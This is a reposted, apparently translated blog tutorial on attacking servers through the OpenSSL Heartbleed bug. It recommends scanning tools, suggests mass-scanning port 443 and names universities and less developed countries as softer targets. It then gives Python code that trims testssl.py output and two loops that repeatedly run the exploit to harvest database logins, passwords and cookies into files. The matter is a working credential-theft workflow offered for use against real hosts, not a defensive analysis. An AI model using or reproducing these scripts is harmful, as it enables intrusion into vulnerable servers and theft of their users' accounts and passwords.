A simple attack example for the OpenSSL Heartbleed vulnerability

Source: Internet
Author: User

Transferred from: http://www.lijiejie.com/openssl-heartbleed-attack/

  

The public disclosure and prevalence of the OpenSSL Heartbleed vulnerability has excited a lot of people and made others panic. From the attack point of view, the online scanning tools I already know of are:

1. The Nmap script ssl-heartbleed.nse: http://nmap.org/nsedoc/scripts/ssl-heartbleed.html

    nmap -sV --script=ssl-heartbleed <target>

2. Jared Stafford's testssl.py: https://gist.github.com/sh1n0b1/10100394

3. CSHeartbleedScanner: http://www.crowdstrike.com/community-tools/

If you want to search for attack targets in bulk, you can scan port 443 of the target IP segment directly. Universities and countries where the Internet is less developed are more prone to attack. Get the IP addresses of the active hosts, and then import them into the scanner.

For a specific attack target, you can view what has been read and use regular expressions to keep pulling accounts and passwords. You can also keep capturing cookies, accounts and so on based on keywords.

Modify the testssl.py code so that it does not output the offset address or non-ASCII characters. Find the hexdump function and change it to:

    def hexdump(s):
        # Python 2, like testssl.py itself.
        # Keep printable ASCII only; every other byte becomes '.'.
        pdat = ''
        for b in xrange(0, len(s), 16):
            lin = [c for c in s[b : b + 16]]
            pdat += ''.join((c if 32 <= ord(c) <= 126 else '.') for c in lin)
        # Drop runs of dots so that only readable strings remain.
        print '%s' % (pdat.replace('...', ''),)
        print

This will only output useful ASCII strings.

1. Grabbing accounts with a regular expression

    import os
    import re
    import time

    accounts = []
    while True:
        # Run the modified script and collect its output.
        result = os.popen('openssl.py').read()
        matches = re.findall('"db":"(.*?)","login":"(.*?)","password":"(.*?)"', result)
        for match in matches:
            # Record each (db, login, password) tuple only once.
            if match not in accounts:
                accounts.append(match)
                with open('accounts.txt', 'a') as inFile:
                    inFile.write(str(match) + '\n')
                print 'New account:', match
        time.sleep(1.0)

The script reads the data once a second and looks for accounts and passwords that match the regular expression. If a match has not appeared before, it is written to accounts.txt. This avoids repeatedly writing the same account and password.

2. Capturing data by keyword

If you are not sure of the back-end address and do not know the format of the login request or the cookie, you can capture accounts directly by keyword, with code similar to the following:

    import os
    import time

    while True:
        result = os.popen('openssl.py').read()
        keywords = ['system', 'password', 'passwd', 'admin']
        for word in keywords:
            if word in result:
                print 'new data', time.asctime()
                # File name is the current time; ':' is not allowed in Windows file names.
                with open('data_1\\' + time.asctime().replace(':', ' ') + '.txt', 'w') as f:
                    f.write(result)
                break
        time.sleep(1.0)

This way, once the returned data contains a keyword such as passwd or password, the data is written to the data_1 folder in a file named after the current time.

  
